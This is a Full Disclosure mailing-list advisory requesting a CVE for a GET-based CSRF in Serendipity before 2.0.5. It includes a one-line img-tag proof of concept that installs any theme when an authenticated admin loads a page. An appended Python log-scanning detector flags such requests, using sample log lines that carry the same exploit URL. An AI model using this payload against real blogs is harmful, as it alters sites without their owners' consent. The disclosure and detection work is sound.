Full Disclosure mailing list archives
CVE Request: CSRF in Serendipity allows an attacker to install any theme
From: Wester 95 <evilzyzeng () outlook com>
Date: Sun, 9 Apr 2017 10:17:46 +0000
Hi team, I would like to request one CVE id, thank you!

Details
======
Software: s9y Serendipity
Version: <2.0.5
Homepage: https://docs.s9y.org/

Description
================
A GET-type CSRF in Serendipity allows an attacker to install any theme; the theme-install action carries no anti-CSRF token.

POC:
========
Include this in a page; when an authenticated admin views it, the attack will occur:

<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartleby">

Mitigations
=======
Update to Serendipity v2.1.x

FIX:
==========
https://github.com/s9y/Serendipity/issues/452

Best regards,
Zhiyang Zeng of Tencent security platform department

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
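A log-side detection for the pattern in this advisory, added here as an example and not code from the original post or from the Serendipity project: it parses Apache combined-format access log lines (constructed samples) and flags GET requests that reach the templates/install action with a Referer from a different origin, or with no Referer at all. The site origin http://127.0.0.1, the sample client IPs and hostnames, and the theme name "sampletheme" are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache "combined" log lines (not real logs); line 1 carries the exact
# query string of the PoC above, fetched from a page hosted on another site.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Apr/2017:10:17:46 +0000] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartleby HTTP/1.1" 200 5120 "http://blog.example/post.html" "Mozilla/5.0"
203.0.113.7 - - [09/Apr/2017:10:18:02 +0000] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates HTTP/1.1" 200 8012 "http://127.0.0.1/serendipity/serendipity_admin.php" "Mozilla/5.0"
198.51.100.4 - - [09/Apr/2017:10:19:30 +0000] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=sampletheme HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [09/Apr/2017:10:20:11 +0000] "GET /serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=sampletheme HTTP/1.1" 200 5120 "http://127.0.0.1/serendipity/serendipity_admin.php" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')

def parse_line(line):
    """Split one combined-format line; parse_qs percent-decodes keys, so
    serendipity%5BadminModule%5D comes back as serendipity[adminModule]."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["file"], rec["query"] = url.path, {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec

def origin(url):
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else ""

def csrf_reason(rec, site_origin):
    """Why this request looks like the GET-based theme-install CSRF, or None.
    The install action changes state, so a GET reaching it with a Referer from another
    origin (or none, as with some embedded resources) was not sent by the admin UI."""
    q = rec["query"]
    if rec["method"] != "GET" or not rec["file"].endswith("serendipity_admin.php"):
        return None
    if q.get("serendipity[adminModule]") != "templates" or q.get("serendipity[adminAction]") != "install":
        return None
    ref = origin(rec["referer"])  # "" when the log shows "-" (no Referer sent)
    if not ref:
        return "theme install via GET with no Referer"
    return None if ref == site_origin else f"theme install via GET referred from {ref}"

def scan(log_text, site_origin):
    # Returns (client IP, requested theme, reason) for each suspicious request.
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (why := csrf_reason(rec, site_origin)):
            hits.append((rec["ip"], rec["query"].get("serendipity[theme]"), why))
    return hits
```

Running `scan(SAMPLE_LOG, "http://127.0.0.1")` reports the cross-site request for "bartleby" and the Referer-less one for "sampletheme", while the same-origin requests pass.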
Current thread:
- CVE Request: CSRF in Serendipity allows an attacker to install any theme Wester 95 (Apr 11)